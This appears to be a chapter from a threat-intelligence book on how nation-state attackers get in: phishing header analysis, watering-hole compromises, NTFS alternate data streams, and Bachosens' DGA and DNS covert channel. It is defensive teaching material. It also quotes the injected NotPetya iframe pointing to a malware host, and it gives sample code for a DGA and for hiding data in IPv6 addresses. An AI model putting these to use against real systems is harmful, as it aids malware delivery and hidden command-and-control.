One of the problems plaguing nation-state attackers is all the funding and resources they lose once they’ve been outed. Attacks such as the ones we discussed in Chapter 1 often bring attention to both the victims and the governments behind them, revealing details such as the attacker’s origin, tactics, and malware. Once these are known, security vendors update their products to patch vulnerabilities and create signatures to identify the malware. Now the attacker must develop new malware and hack tools. They’ll also have to obtain new infrastructure if they want to continue operations.
After years of constantly creating new, expensive technologies for their operations, attackers found the answer: simplicity. They realized many of the legitimate tools present in victim environments could perform the tasks necessary to compromise their targets. Developers had already created tools for network-, system-, and security-related functions. Many of these tools have the potential for dual use, meaning that someone could use them for both legitimate and nefarious purposes. Plus, many organizations “whitelist” these tools to prevent security solutions from flagging their use, since admin and security staff use them. And even when security automation detects a suspicious use of a legitimate tool, defenders often ignore it under the assumption that the activity came from one of the sanctioned sources within their environment.
Adversaries began to catch on to this, so they used it to their advantage. These tools helped attackers to compromise victims and gain a foothold within their environments. One good example is Microsoft Sysinternals, a suite of more than 70 tools. Microsoft designed Sysinternals to manage Windows administrative tasks such as executing Windows processes, bypassing login screens, escalating and evaluating policies and account privileges, and performing many other useful tasks for a system administrator. Unfortunately, attackers can take advantage of many of the capabilities Sysinternals provides.
Yet attackers still require an initial infection vector: a means of entering the environment in the first place. This usually involves some sort of social engineering, combined with malware or an exploit. If defensive measures don’t identify this initial infection, the attacker will most likely remain undetected by using legitimate tools to further their compromise. This chapter will cover these infection vectors and how to detect them. We’ll also discuss handling some of the unique and interesting tactics that adversaries have used to infect systems and extract data. These tactics often include deceptive methods that allow attackers to go unnoticed and, in some cases, even elude existing defenses.
Previous chapters of this book have discussed spear-phishing emails, which are the most popular initial infection vector used in nation-state compromises. Unlike regular phishing emails, spear-phishing emails are crafted specifically for the recipient and are thus more difficult to detect. Therefore, defenders must know how to analyze these emails to learn information about the attacker and defend against them more effectively.
The best way to detect phishing is to understand the basic components that make up the Simple Mail Transfer Protocol (SMTP) header found in every email sent and received across the internet. SMTP is the standard protocol used in the transmission of email, and its header is a log of all the points the email traversed while in transit. Basically, SMTP headers provide a map of where the email originated and who it communicated with on its way to the intended recipient. By analyzing an email header, you can determine if the email came from the actual source sender address or if an attacker spoofed it to simply appear as the legitimate email originator. In other words, you can determine if it’s being sent by who you think it is or by someone pretending to be that person.
You’ll likely be able to obtain access to SMTP headers in one of two ways. The first is through your email client, which generally offers an option to view them as part of the email’s properties, though each client varies in this respect. This method works best for analyzing single emails, such as when you receive a suspicious email you want to review. However, analysts will often want to access this information directly from the source, such as an SMTP server or its associated log server within your environment. This second way allows you to research and correlate header data at a greater capacity, and accessing the information at the source is far more efficient than manually opening each email through a client interface.
Here is an example from a spear-phishing campaign linked to a nation-state attacker in 2010. The emails and the associated headers reviewed in this chapter are dated but provide an opportunity to learn from real-world examples.
The following information appeared in the header of one of the emails:
Received: from mtaout-ma05.r1000.mx.aol.com
(mtaout-ma05.r1000.mx.aol.com [REDACTED])
by imr-db01.mx.aol.com (8.14.1/8.14.1) with ESMTP id
oB88rVOV012077 for <@REDACTED>; Wed, 09 Dec 2010 09:53:31
-0500
1 Received: from windows-xp (unknown [121.185.129.12]) by
mtaout-ma05.r1000.mx.aol.com (MUA/Third Party Client Interface)
with ESMTPA id 01C78E000067 for <@REDACTED>; Wed, 08 Dec
2010 03:53:23 -0500 (EST)
Date: Wed, 08 Dec 2010 17:53:24 +0900
2 From: [email protected]
3 To: [email protected]
Subject: The Hanfords' Holiday Party
Message-id: [email protected]
MIME-version: 1.0
X-Mailer: WinNT's Blat ver 1.9.4 http://www.blat.net
Content-type: multipart/mixed;
boundary="Boundary_(ID_4kM3Jn1RnXd4C8N2btJn5g)"
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/65845
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:272206080:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-IP: REDACTED
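To see how fields like these can be pulled out programmatically, here is a minimal sketch using Python’s standard email parser. The header text is an abbreviated, hypothetical stand-in for the example above; the addresses are invented, since the real ones are redacted.

```python
# Parse a raw SMTP header and pull out fields of interest.
# The header below is a hypothetical, abbreviated stand-in for the
# AOL example above; addresses are invented.
from email import message_from_string

raw = """\
Received: from mtaout-ma05.r1000.mx.aol.com by imr-db01.mx.aol.com with ESMTP
Received: from windows-xp (unknown [121.185.129.12]) by mtaout-ma05.r1000.mx.aol.com
From: [email protected]
To: [email protected]
Subject: The Hanfords' Holiday Party
X-Mailer: WinNT's Blat ver 1.9.4 http://www.blat.net

(body)
"""
msg = message_from_string(raw)
for field in ("From", "To", "Subject", "X-Mailer"):
    print(f"{field}: {msg[field]}")

# Received headers stack newest-first; reading bottom-up, the last one
# is the earliest hop and holds the originating IP.
print("Earliest hop:", msg.get_all("Received")[-1])
```

The same approach scales from a single suspicious email to bulk processing of server logs.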
The To field is the name and address information of the email’s intended recipient 3. Sometimes attackers will make this a random address, referred to as a hard target, while the intended victim recipients appear in the email header’s CC or BCC line as soft targets. The hard target will be visible to all recipients, including those in the CC or BCC fields. Simply put, this adds to the legitimacy of the email, particularly if the hard target address belongs to someone the targets actually know, enticing them to open the email. For example, imagine you don’t know the sender but see your boss’s legitimate email address in the To field. While your boss may not be the target and the email may seem irrelevant to them, you may open it, believing it to be legitimate. Even if the hard target’s email address isn’t real, only the sender will receive the undeliverable mail notification.
If you can see the recipients of the email and there are more than one, you can use that information to identify relationships between the individuals or even find the source of the target list, which you can often find in open source information.
The From field is the sender of the email 2. It’s important to understand that adversaries can spoof or mask this field to make it appear as though it’s coming from someone the recipient knows. Thus, it is just as critical to verify the authenticity of the From address as it is the To address. This is especially significant in situations where the sending address may actually be a user’s legitimate email address, because it allows you to identify whether the account is compromised or merely spoofed. For example, if you receive an email from your supervisor’s legitimate email address and they’re sending you a malicious attachment, there is a good chance someone has compromised their account and is using it in a spear-phishing campaign. Multiple fields will typically include the sender’s email address, such as From, Sender, X-Sender, and Return-Path. If the address in these fields varies, the email is likely fraudulent.
Here’s a tip: take notice of the alias, which is the sender’s name as displayed to the recipient. You’ll typically find this name to the left of the email address, and it can be anything the creator of the email address specifies. The alias field shows this human-readable name to make it easier for us to see who is sending the email, but often attackers will make it the name of someone the target knows, regardless of the email’s legitimacy.
Another tactic is to place a legitimate sender’s email address in the alias field, since this field displays by default in many email clients. Now the victim sees the legitimate email address even though the email isn’t actually coming from that sender. This is a sneaky way to deceive a target, and often convincing, with a high level of success in spear-phishing attacks.
The originating IP field is the IP address from which the email originated 1. However, there are several IP addresses listed in the email header, because each endpoint at which a mail server processes the email (also known as a hop) will leave its IP address stamped on the header. Always read the header from the bottom up; this ensures you review each IP address in the order in which it traversed the internet. In this example, the IP address is listed in the Received field.
Unfortunately, IP addresses associated with a public provider’s mail infrastructure, such as Gmail, Yahoo, or Microsoft, won’t help you. These providers mask the originating IP address with their own, creating an additional level of anonymity to protect webmail users. However, when sent from a commercial account, such as a business email address, you’ll see the actual IP address.
From the originating IP address, you can learn several things. First, you can identify a company or organization leasing the IP address. Run a Whois lookup and check the records related to the IP address; sometimes, organizations lease blocks of IP addresses that display the organization name in the record. Second, you can identify domains hosted on the IP address using a reverse DNS lookup. Next, you can run a passive DNS query to identify domains previously hosted on the IP address. We’ll discuss how to run these queries in Chapter 7.
Many SMTP fields begin with X-. Known as X-Headers, these fields are created and added during the sending of the email. Because they’re generated by mail-server automation, they’re named in this format to separate them from the fields created by the originating mail client.
The X-Mailer field provides information about the mail client application that created the email. It’s worth tracking this field because, in some cases, adversaries use unique or low-prevalence applications to compose their emails. This is true of both nation-state attacks and spam campaigns. When this client is unusual enough, or generally not seen in legitimate traffic by the organization you are protecting, you can block it, preventing future malicious emails from reaching the targeted recipient.
When I tracked this campaign over time, I noticed the attacker always used the Blat X-Mailer and sent the phishing email from an AOL account. While the Blat X-Mailer is a legitimate tool, it stood out because I only ever received malicious emails from it, never legitimate ones. Now I could set up rules to flag any emails that used Blat and originated from AOL. Using this method, I could capture any new email sent by the attacker until they changed their tactics.
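The tracking rule described above can be sketched as a simple predicate; the field values are illustrative, not a production detection.

```python
# Flag mail composed with the Blat X-Mailer that transited AOL
# infrastructure, mirroring the tracking rule described above.
def flag_blat_from_aol(headers: dict) -> bool:
    xmailer = headers.get("X-Mailer", "").lower()
    hops = " ".join(headers.get("Received", [])).lower()
    return "blat" in xmailer and ".mx.aol.com" in hops

# Header values taken from the example earlier in the chapter.
hdrs = {
    "X-Mailer": "WinNT's Blat ver 1.9.4 http://www.blat.net",
    "Received": [
        "from windows-xp (unknown [121.185.129.12]) "
        "by mtaout-ma05.r1000.mx.aol.com"
    ],
}
print(flag_blat_from_aol(hdrs))  # True
```

A real deployment would express the same logic as a mail-gateway or SIEM rule, but the combination of attributes is the point: either attribute alone is legitimate; together they matched only this attacker.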
The following is another example of a unique X-Mailer found in a phishing email from a nation-state group named Nitro:1
Received: from (helo=info15.gawab.com)
(envelope-from <[email protected]>) id
; Wed, 11 May 2011
08:48:43 +0200
Received: (qmail 3556 invoked by uid 1004); 11 May 2011 06:48:42 -0000
Received: from unknown (HELO -.net) ([email protected]) by gawab.com with
SMTP; 11 May 2011 06:48:42 -0000
X-Trusted: Whitelisted
Message-ID: <[email protected]>
Date: Wed, 11 May 2011 14:48:38 +0800
From: xxxxxx
To: xxxxxx
Subject: Important notice
X-mailer: hzp4p 10.40.1836
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="_AHrFp2Hwqfwj3DD2dAGF8H9sC"
Return-Path: [email protected]
X-MS-Exchange-Organization-SCL: 0
This unique X-Mailer has only ever been seen in Nitro spear-phishing campaigns. The identification of this low-prevalence X-Mailer allowed defenders to track the group’s activities.
The Message-ID found in the email header is a unique identifier that mail servers use to provide a digital fingerprint for every mail message sent. These Message-IDs start and end with angle brackets, like this: <[email protected]>. No two emails should have the same ID; even a response to an email will have its own.
Message-IDs can help prove an email’s validity. If you find multiple emails with the same Message-ID, they’re likely forged; quite simply, the mechanics of how messages travel from sender to recipient intrinsically prevent this from happening. Sometimes, though, an adversary manually creates a phishing email by reusing a header from another email. They’ll do this to make it look like the target of the fraudulent email had already forwarded or replied to it. But in doing so, they also reuse the Message-ID from another email.
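A sweep for reused Message-IDs across a corpus of collected mail can be sketched in a few lines; the corpus here is invented.

```python
# Reused Message-IDs across unrelated mails point to forged headers.
# The (subject, message_id) corpus below is hypothetical.
from collections import Counter

corpus = [
    ("Party invite", "<20100322.091722@mail.example>"),
    ("Quarterly report", "<84b7f2c1@corp.example>"),
    ("Important notice", "<20100322.091722@mail.example>"),  # same ID reused
]
counts = Counter(mid for _, mid in corpus)
forged = [mid for mid, n in counts.items() if n > 1]
print(forged)
```

Run against a mail archive, any ID that appears more than once is worth pulling for manual review.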
To see how this works, take a look at the following two headers for emails that a nation-state attacker used in an espionage campaign:
Phishing email header #1
Return-Path: <[email protected]>
Received: from msr20.hinet.net (msr20.hinet.net [168.95.4.120])
by mx.google.com with ESMTP id 7si8630244iwn.16.2010.03.22.02.17.22;
Mon, 22 Mar 2010 02:17:24 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning [email protected] does not designate 168.95.4.120 as permitted sender) client-ip=168.95.4.120;
Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning [email protected] does not designate 168.95.4.120 as permitted sender) [email protected]
Received: from REDACTED (www.REDACTED.tw [211.22.16.234])
by msr20.hinet.net (8.9.3/8.9.3) with ESMTP id RAA28477;
Mon, 22 Mar 2010 17:16:22 +0800 (CST)
Date: Mon, 22 Mar 2010 17:16:22 +0800 (CST)
From: [email protected]
1 Message-ID:<[email protected]>
Subject: =?gb2312?B?x+u087zSubLNrLnY16KjoQ==?= <[email protected]>
MIME-Version: 1.0
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
Phishing email header #2
Received: from REDACTED.co.kr (HELO REDACTED.co.kr) (211.239.118.134)
by REDACTED
Received: from techdm ([218.234.32.224]:4032)
by mta-101.dothome.co.kr with [XMail 1.22 PassKorea090507 ESMTP Server]
...
Wed, 30 Jun 2010 23:21:06 +0900
2 Message-ID: <[email protected]>
From: xxxxx
To: XXXXXXXXXXXXXXX
Subject: =?big5?B?MjAyMLDqqL6s7KfesqO3frWmsqS9177CrKGwyg==?=
Date: Wed, 30 Jun 2010 22:07:21 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000B_01CB18A0.9EBCFA10"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Content-Disposition: form-data; name="Invitation"; filename=" Invitation.pdf"
The emails have different dates and subjects yet the same Message-ID 1 2. As it turns out, the attacker used this Message-ID for all of their spear-phishing emails over a period of about a year, likely because some sort of automation created or sent the spear phishes. Another less likely yet still possible reason is that they simply copied and pasted the same information into every phishing email they created. Regardless, the Message-ID was great not only for identifying the email as fraudulent, but also for linking these emails to this specific attacker.
It is highly unlikely the recipients of the spear-phishing emails would be able to identify details such as this. However, as a cyber defender, when you track attributes of suspicious phishing emails such as the Message-ID over time, you can identify these attributes and use them to defend against future attacks.
Yet another field can help authenticate an email: the In-Reply-To field, which contains the Message-ID of the original message being replied to. The Message-ID and the In-Reply-To identifiers should differ; if an email’s Message-ID and In-Reply-To ID are the same, the email is fraudulent. (The example we’ve considered here does not have an In-Reply-To field, but some SMTP headers will include it.)
The Date field represents the date on which a user sent the email, and when included, the Delivery-Date field represents the date on which the message was actually delivered. These dates may not seem useful at face value, yet when you track phishing campaigns over time, you might be able to use them. Sometimes attackers will send the same phishing email to multiple victims during the same time frame. Remember that, as discussed in Chapter 5, the time zone listed in the Date field can also provide evidence you can use to attribute the region of the world from which the email was sent. Match the time zone offset with the regions or countries that use it. For example, an email stamped with “+0830” would point toward North Korea, which used that unusual offset between 2015 and 2018. Always take note of these details.
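Python’s standard library can extract the offset directly; a short sketch using the Date value from the AOL example earlier in the chapter:

```python
# Parse the Date header's UTC offset to profile the sender's likely region.
from email.utils import parsedate_to_datetime

date_header = "Wed, 08 Dec 2010 17:53:24 +0900"  # from the AOL example
dt = parsedate_to_datetime(date_header)
hours = dt.utcoffset().total_seconds() / 3600
print(f"Sender's clock is UTC{hours:+.1f}")  # UTC+9.0
```

An offset of +9:00 narrows the likely origin to Korea, Japan, and a few neighboring regions; it is a clue for correlation, not proof on its own.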
The Subject field can help determine the adversary’s content of interest. For example, if the subjects of multiple phishing emails from the same attacker are all energy themed, you can make an educated assumption that the attacker is likely interested in energy-related targets. This is particularly useful when you don’t know all of the email’s recipients. For instance, an individual from your organization may have received the email in addition to several others from outside of your organization.
Phishing emails usually include either an attachment or a URL that leads to a malicious website. Defenders should track whichever of these is present. The name of the attachment or URL domain can also help indicate the attacker’s target or industry of interest. If there is an attachment associated with the email, you can determine its file type by looking at the Content-Type or Content-Disposition field in the header. The name of the attached file will also appear in the name or filename field.
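Extracting attachment names and types from a captured message is straightforward with Python’s standard email parser; the MIME body below is a hypothetical stand-in.

```python
# Walk a MIME message and report attachment types and filenames,
# as found in the Content-Type and Content-Disposition fields.
# The message below is invented for illustration.
from email import message_from_string

raw = """\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

See the attached invitation.
--XYZ
Content-Type: application/pdf; name="Invitation.pdf"
Content-Disposition: attachment; filename="Invitation.pdf"

%PDF-1.4 (truncated)
--XYZ--
"""
msg = message_from_string(raw)
attachments = [
    (part.get_content_type(), part.get_filename())
    for part in msg.walk()
    if part.get_filename()
]
print(attachments)
```

Note that the declared Content-Type is attacker-controlled; always verify the actual file type of the extracted payload as well.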
Adversaries commonly use freely available blog and text-hosting websites to provide instructions to malware. They may place encoded content into the HTML source code of a website, for instance, or post a comment to the page that the malware can read as part of the compromise.
For example, attackers used a number of free WordPress websites to target people in India beginning in 2013. Figure 6-1 shows one of these sites.
Figure 6-1: WordPress blog site containing malicious encoded content used by the Syndicasec malware
The malware, known as Syndicasec, would connect to the blog and read the encoded string, which provided the address of the command-and-control server to connect to.4 Once the malware decoded this configuration information, it would contact the server, where it could download additional malware or send victim information to the attacker. By designing the malware to obtain the server address from another legitimate website, the attacker could ensure that their operation would continue even if the target identified, blocked, and took down their infrastructure; the attacker could simply change the encoded string on the legitimate web page to point to a new server. This strategy also made detection difficult. Most firewalls won’t block a legitimate website, and the code on the page isn’t itself malicious.
The attacker in this campaign, which originated from China, used this technique many times over several years, posting samples of encrypted code like the following to blogs, or placing them in the source code of compromised pages: @J4AB?h^_:C98C=LMHIBCROm[UqTLv0ZXQSa "!T`a$g`[email protected].
Other than using freely available websites, attackers sometimes perform strategic web compromises of legitimate sites, as discussed in earlier chapters. In 2017, ransomware known as NotPetya wreaked havoc on financial institutions globally. At least one of the infection vectors involved the use of a Polish financial supervision website that had been compromised. The attacker realized many banks would access the site, so they placed an iframe in the site’s HTML source code. This iframe redirected victims to another attacker-created website, which downloaded the NotPetya malware:
<iframe name='forma' src='https://sap.misapor[.]ch/vishop/view.jsp?pagenum=1'>
As you can see, the iframe directs the visitor to sap.misapor[.]ch, where a Microsoft Silverlight application infects the victim.5 Within the first day of this attack, more than 20 financial institutions in Poland became infected.
When investigating an attack, it’s important to distinguish legitimate but compromised infrastructure from attacker-created infrastructure, because in each case you’ll likely handle the indicator (whether that be the domain, URL, or IP address) differently. In situations like the NotPetya case, where legitimate websites were compromised, you may not want to create a rule that permanently blocks activity from the legitimate website, since the site’s owner will probably mitigate and remove the malicious content eventually. If, however, an adversary created the domain specifically to use in attacks, you would likely want to permanently block it.
Luckily, determining if a domain is compromised or attacker-created is usually an easy task once you know what to look for. Checking domain registration, search engine results, and website archives can all help you make an accurate assessment. Domain registration records often provide clues if the attacker registered the domain themselves. While it’s unlikely that they would publicly display legitimate registration information, you can compare the date of the domain’s creation to its last update and determine if the update matches the malicious activity’s timeframe. If it was updated or created at or near the time of the attacks, it’s possible the attacker created the domain. For example, the following is the registration for a domain used in attacks beginning in December 2019.6 The registration dates show that someone created the domain a few weeks prior to its use in attacks. Since the dates of activity and registration align, it suggests an attacker created the domain.
Domain Name: MASSEFFECT.SPACE
Registry Domain ID: D147467801-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru
Updated Date: 2019-11-30T07:02:34.0Z
Creation Date: 2019-11-25T06:29:30.0Z
Registry Expiry Date: 2020-11-25T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Email: [email protected]
Admin Phone: +7.4955801111
Admin Email: [email protected]
Tech Phone: +7.4955801111
Tech Email: [email protected]
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing Phone: +7.4955801111
Billing Email: [email protected]
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +7.4955801111
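A quick way to apply this reasoning to the record above is to compare the registration dates against the first observed activity. The exact first-seen date in December is an assumption for illustration; the campaign is only dated to "beginning in December 2019."

```python
# Compare a domain's registration dates to its first observed use in attacks.
# Creation/update dates come from the WHOIS record above; the first-seen
# attack date is an assumed value for illustration.
from datetime import date

creation = date(2019, 11, 25)       # Creation Date
updated = date(2019, 11, 30)        # Updated Date
first_attack = date(2019, 12, 15)   # assumed first-seen activity

age_at_attack = (first_attack - creation).days
print(f"Domain was {age_at_attack} days old at first attack")
likely_attacker_created = age_at_attack < 90  # heuristic threshold
print("likely attacker-created:", likely_attacker_created)
```

A freshly registered domain is not proof by itself, but combined with the privacy-protected registrant and the timing alignment, it strongly suggests attacker-created infrastructure.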
The domain’s IP address resolution can also help with this assessment. While not a hard rule, legitimate websites are often hosted either on a web server with many other domains or on corporate infrastructure whose domains are all associated with the same company. Attackers may not want to share IP space with other infrastructure, and because of that, they will often lease infrastructure to host only their own domains. When you encounter this scenario, you should conduct additional research to determine if the other domains are also linked with the attacker’s operations.
In other instances, attackers might register websites and park them on a hosting provider’s server until they are ready for an attack. When a domain is parked, it resolves to a nonroutable IP address; essentially, the domain is offline and can’t serve live content. For someone to use the domain, it would need to move to a live, routable IP address. If the timeframe of that resolution change matches the time of the malicious activity, it can indicate the attacker controls the domain.
Finally, domain archive websites such as https://archive.org/ capture the historical state of websites, and you can query them to determine and validate the website’s previous usage. Looking at the archived state of a domain of interest should quickly reveal its legitimacy. For example, in Figure 6-2, you can see that different users have archived AOL’s website 354,600 times since December 20, 1996. If you had never heard of the site and first came across the domain while investigating malicious activity, seeing this many captures would suggest that the domain was indeed legitimate, as opposed to malicious and fraudulent.
You should still be cautious when researching domains that you suspect of hosting malicious activity, however. If you view a website’s archive for one of the dates on which it hosted malware, you could very well infect yourself. This is especially true if the compromised domain used JavaScript or an iframe to redirect visitors to other malicious infrastructure.
Figure 6-2: Historical website record from https://archive.org/ as seen in 1997
Advanced adversaries often develop their own malware to use in targeted attacks. In doing so, they’ll often hide in plain sight, which is a difficult tactic to defend against. By blending in with legitimate traffic and using commonly accessed public infrastructure, the attackers often go unnoticed. This means that defenders must look at both malicious and legitimate activity to understand the attack taking place. Let’s consider some real-world examples.
In Chapter 1, we discussed Iran’s cyberwarfare program and its history. One of the attacks, known as Shamoon, relied on destructive malware that wiped infrastructure and systems associated with oil companies in the Middle East beginning in 2012. A second wave of Shamoon attacks, in 2016, used a new version of their custom wiper malware. The attacks began after a suspicious binary appeared on a company’s infrastructure in the Middle East. The initial investigation identified a malicious payload with strong similarities to the original Shamoon malware. However, nobody had ever previously seen this variant in the wild.
Analysis of the malware showed that the new payload could steal information from the victim’s system and provide the adversary with remote access, as well as the ability to install additional malware. Upon execution, the malware collected information from the victim system, such as usernames, the IP address, mapped drives, current network connections, and running processes or services.8 After gathering the information, the malware would transmit this data back to the attacker’s remote infrastructure. Analysts eventually detected the malware, naming it Trojan.ISMdoor based on this PDB string found in the binary: Projects\Bot\Bots\Bot5\Release\Ism.pdb.9
ISMdoor may have come to light earlier if the attacker had not hidden in plain sight in such a novel way: the attacker concealed the binary within a legitimate component of NTFS, the file system for current Windows operating systems, referred to as an Alternate Data Stream (ADS). ADS was a feature designed to provide files with everything the application needed to open and run them, as described by the security researcher hasherezade.10 Over time, as operating systems and applications evolved in both size and complexity, the usefulness of ADS changed; it was no longer feasible for an application to carry the amount of data ADS was originally intended to hold. In addition, it takes very little skill to create an ADS, and to make things worse, nobody checks the ADS content for validity, nor is there a strict format the ADS data needs to follow.11 Furthermore, an ADS doesn’t affect the size of its associated file, so you wouldn’t necessarily notice a change in file size if the ADS suddenly contained malicious content.
The attacker behind ISMdoor used ADS to covertly store and exchange information unbeknownst to the end user. They hid the payload in an ADS within a RAR archive and then delivered this archive in a phishing email that targeted key personnel at specific organizations. This allowed them to infect targets with custom-developed malware that was part of a larger espionage and sabotage campaign. While nobody has confirmed attribution at the time of writing, current data suggests that an Iran-based cyber-espionage group known as Greenbug developed this malware for a nation-state sponsor.12
This attack eventually enabled the adversary to steal even more credentials. These credentials were likely used in a second phase of Shamoon’s attack, which the attackers designed to wipe and destroy the systems and servers hosting the malware. By hiding and taking advantage of the legitimate ADS component of the operating system’s NTFS file structure, Greenbug was able to covertly hide malware and infect their predetermined victims.
Attackers are constantly coming up with creative ways like this to get around defenders and breach target environments. In addition to using exploits and elaborate hack tools, sophisticated attackers will also take advantage of flaws present in legitimate software. Malicious code hidden within legitimate applications and protocols can bypass firewalls, intrusion detection systems, endpoint detection, and other automated defenses.
Adversaries sometimes manipulate legitimate internet protocols to communicate with their malware while going unnoticed. In May 2017, an attacker used previously unknown malware to steal sensitive intellectual property. The malware, now known as Bachosens, is a great example of how attackers will abuse and exploit legitimate protocols; the subsequent investigation revealed the use of an interesting and deceptive technique.13
Most malware needs to communicate with command-and-control infrastructure somehow. If not, the attacker will need direct remote access to the victim environment. In the Bachosens case, however, the malware produced very little observable network traffic. This was because the malware sent information over covert channels, leaving the victim networks and defenders blind to what was taking place. The attackers had built two components into the Bachosens malware with the intent of deceiving defenders.14
The first component involves how the malware decides where to send and receive information. Typically, attackers will either register their own infrastructure or compromise legitimate websites that communicate with the malware. In turn, the malware will often use a configuration file to determine where to send and receive commands, or else it will have the command-and-control infrastructure’s address hardcoded in the binary.
In this example, however, the attacker developed malware that relied on a domain generation algorithm (DGA) to determine the C&C server. A DGA is a deceptive technique that uses an algorithm to generate fresh domain names. DGAs have several benefits, the first of which is randomness: the DGA produces domain names made of a predefined number of random characters, and as the malware generates them, the attacker can register them on the fly to ensure fresh infrastructure in each attack. And although Bachosens didn’t take advantage of this feature, DGAs can also generate a high volume of domains during the infection, making it difficult for defenders to identify the real command-and-control infrastructure; imagine that the attacker generated 1,000 domains and registered only one of them. Hunting for the real domain forces the defender to spend time and resources.
The Bachosens malware author used the DGA to create a random domain upon execution in the victim’s environment. Interestingly, though, the Bachosens variants found in the wild generated only 13 domains per year.15 Of those 13 domains, only two were active at any given time, and of those two, only one changed each month; the other remained static for the entire year. (This is important to note, because an advanced attacker would likely maximize the benefits of using a DGA with custom-developed malware. While the malware itself was rather sophisticated, the operator behind it wasn’t so careful, and the decision not to take full advantage of the DGA component eventually led to the attacker’s identification. By reversing the algorithm, defenders had to research only 13 domains, not hundreds or thousands.)
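A minimal sketch may help make the DGA concept concrete. This is an illustrative algorithm only, not Bachosens’s actual one: both the malware and its operator derive the same domain list from a shared seed, so the operator knows which domains to register in advance, and a defender who reverses the algorithm can enumerate every candidate C&C domain for the year.

```python
import hashlib

def generate_domains(seed: str, year: int, count: int = 13, tld: str = ".su") -> list:
    """Generate a deterministic list of pseudorandom domains for a given year.

    A generic DGA illustration (not Bachosens's real algorithm): hashing a
    shared seed with the year and an index means every party running the
    algorithm derives the same domain list.
    """
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}-{year}-{i}".encode()).hexdigest()
        # Use the first 16 hex characters as the domain label.
        domains.append(digest[:16] + tld)
    return domains

# A defender who recovers the algorithm and seed can precompute the
# full year's worth of candidate C&C domains.
candidates = generate_domains("shared-secret", 2017)
print(len(candidates))  # 13
```

Here the seed string, the `.su` top-level domain (echoing the `ostin.su` domain seen in the capture later in this section), and the 13-domain count are illustrative choices, not recovered values.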
In addition to using a DGA to create command-and-control servers, Bachosens communicated covertly over the DNS, ICMP, and HTTP protocols. It initiated the communication to the server through the use of AAAA DNS records, which map a hostname to a 128-bit IPv6 address. IPv6, or version 6 of the Internet Protocol, is designed for communicating and routing traffic across networks. To connect to a website that uses IPv6, clients will query these AAAA records to find the address associated with the domain name.
But the attackers used these DNS records to transmit encrypted information within the IPv6 addresses they contained, which isn’t the protocol’s intended function. Unfortunately, the protocol lacks data validity checks in some of its fields, allowing the attacker to replace the intended data with their own. As specified, an AAAA record holds a 128-bit IPv6 address comprising eight hextets, portions of which serve specific purposes (Figure 6-3).
Figure 6-3: The IPv6 protocol packet structure
As you can see, the source address portion of the packet is composed of three fields: the routing prefix, the subnet ID, and the interface ID. The subnet ID field was designed to grant network administrators the ability to define subnetworks within their network address space, but the Bachosens attacker took advantage of this feature by placing encrypted data into this portion of the packet. The following is an example of the AAAA DNS request that the Bachosens malware generated:
2016-08-08 17:26 2016-08-08 17:26 v5i7lbu5n08md2oaghfm2v1ft2z.ostin.su (rrset) AAAA d13:8355:57fe:3f93:7c8a:d406:e947:7c04, a96a:61c:1798:56ee:5a13:4954:1146:f105 2
decrypted message = {87 (1) | 3d55 (2) | c128738c (3) | f40101 (4) | 0201 (5) | 0 (6) | 00000003 (7)}
The encrypted data that the malware inserted into the request contains commands that, once decrypted, allow the attacker to identify specific victims via a session ID. This data breaks down into the following components to reveal information taken from the victim:
(1) nonce = 87
(2) checksum = 3d55
(3) session_id = c128738c
    infection_year = 2016
    infection_month = 8
    infection_day = 8
    infection_random = 738c
(4) sid_relative_identifier = f40101
(5) request_kind = 0201
(6) padding_size = 0
(7) request_sequence = 00000003
The attacker uses session ID c128738c to encrypt data in future communications between the infected victim and their command-and-control infrastructure. Next, the Bachosens malware transmits victim information back over the same covert channel, this time including details such as the operating system, username, and associated permissions. The attacker used these IDs to track details about the infections, like when the infection began and when communication with the victim last took place.
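The covert channel itself can be sketched in a few lines. This is a simplified illustration only: the real malware encrypted its payload and placed it in specific address fields such as the subnet ID, rather than packing raw bytes end to end as shown here.

```python
import ipaddress

def embed_in_ipv6(payload: bytes) -> str:
    """Pack up to 16 bytes of data into the hextets of an IPv6 address.

    Illustrates the covert-channel idea only; Bachosens's actual encoding
    encrypted the payload and targeted specific address fields.
    """
    padded = payload.ljust(16, b"\x00")[:16]
    return str(ipaddress.IPv6Address(padded))

def extract_from_ipv6(addr: str) -> bytes:
    """Recover the raw 16 bytes carried in an IPv6 address."""
    return ipaddress.IPv6Address(addr).packed

# The first bytes of the decrypted message shown above, smuggled into
# what looks like an ordinary AAAA answer.
covert = embed_in_ipv6(bytes.fromhex("873d55c128738c"))
print(covert)  # 873d:55c1:2873:8c00::
print(extract_from_ipv6(covert)[:7].hex())  # 873d55c128738c
```

To a defense that only validates DNS syntax, such an address is indistinguishable from a legitimate AAAA answer, which is exactly why this traffic went unnoticed.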
Symantec was the first to identify this attack. In public reports, it documented the process of tracing the activity to its command-and-control infrastructure to identify the individual behind the attacks.16
